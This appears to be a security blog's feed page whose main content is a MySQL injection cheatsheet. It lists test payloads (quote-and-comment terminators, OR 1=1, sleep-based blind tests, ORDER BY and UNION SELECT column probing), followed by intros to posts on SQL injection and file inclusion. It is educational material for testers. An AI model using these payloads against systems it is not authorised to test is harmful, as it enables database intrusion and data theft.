Web Attacks on Welcome to noobsec

MySQL Injection Cheatsheet

Wed, 29 Jul 2020 13:10:00 +0000

MySQL Injection cheatsheet

Testing checklist

Name	Character	Function
Single quote	`'`	String terminator
Semi colon	`;`	Query terminator
Comment	`-- -`	Removes the rest of the query
Comment	`#`	Removes the rest of the query
Comment	`/comment this/`	Can be placed anywhere in a query, used for bypassing weak filters
Single quote with a comment	`'-- -`	End a string and remove rest of the query
Single quote, semi colon and a comment	`';-- -`	End a string, end query, and remove rest of the query
OR operator	`OR 1=1-- -`	For integers, `true` test
OR operator	`OR 1=2-- -`	For integers, `false` test
OR operator	`' OR '1'='1'-- -`	For strings, `test` test
AND operator	`AND 1=1-- -`	For integers, `true` test
AND operator	`AND 1=2-- -`	For integers, `false` test
AND operator	`' AND '1'='1'-- -`	For strings, `true` test
Arithmetic	`?id=2-1`	For integers, arithmetic operation would load the resultant post
Sleep function	`OR sleep(5)-- -`	Blind test

Functions

Function	Description
`database()`	Get the name of the working database
`user()`	Get the name of the user operating on the working database
`version()`	MySQL version
`concat()`	Concatenate two or more strings per row
`group_concat()`	Concatenate all the strings in one row
`substring('string'/<column_name>,<offset>,<length>)`	Get a part of the value of a string or column
`ord()`	Convert the value to ordinal (decimal)

Number of Columns

Method	Description
`ORDER BY 3-- -`	For numbers. If column index provided exceeds the number of column present in the table, there will be an error
`' ORDER BY 3-- -`	For string. If column index provided exceeds the number of column present in the table, there will be an error
`UNION SELECT 1,2,3-- -`	For numbers. It will throw an error till right number of columns haven’t been “SELECT"ed

Database Contents

Works with UNION queries

SQL Injection 0x03 - Blind Boolean Attacks

Sat, 18 Jul 2020 14:37:47 +0000

SQL Injection 0x03 - Blind Boolean Attacks

Introduction

Blind SQL injection are the type of SQL injections attacks wherein no database error is received from the web responses, there are either subtle or no changes to the web page upon sending injection payloads. Since these changes are either subtle or non-existent, it becomes harder to identify and exploit these vulnerabilities but are certainly not impossible.

SQL Injection 0x02 - Testing and UNION Attacks

Fri, 10 Jul 2020 22:31:47 +0000

SQL Injection 0x02 - Testing and UNION Attacks

Introduction

Hi, welcome to the second post of the sql injection series, if you haven’t read the first part of the series, you can read it here.

SQL Injection - 0x01

Fri, 03 Jul 2020 16:22:37 +0000

SQL Injection 0x01

Hi, welcome to the first post of the SQL injection series. Before we dive into the “injection” part of it, let’s first understand the basics of what SQL is and the usual structure of a database-driven system.

File Inclusion

Mon, 29 Jun 2020 21:44:39 +0000

File Inclusion

Introduction

File inclusion vulnerabilities are of two types: Remote File Inclusion (RFI) and Local File Inclusion (LFI). RFI is said to be present when a web application allows remote users to load and execute a remote file on the server. LFI is said to be present when a web application allows remote users to load any pre-existing file and execute it on the server.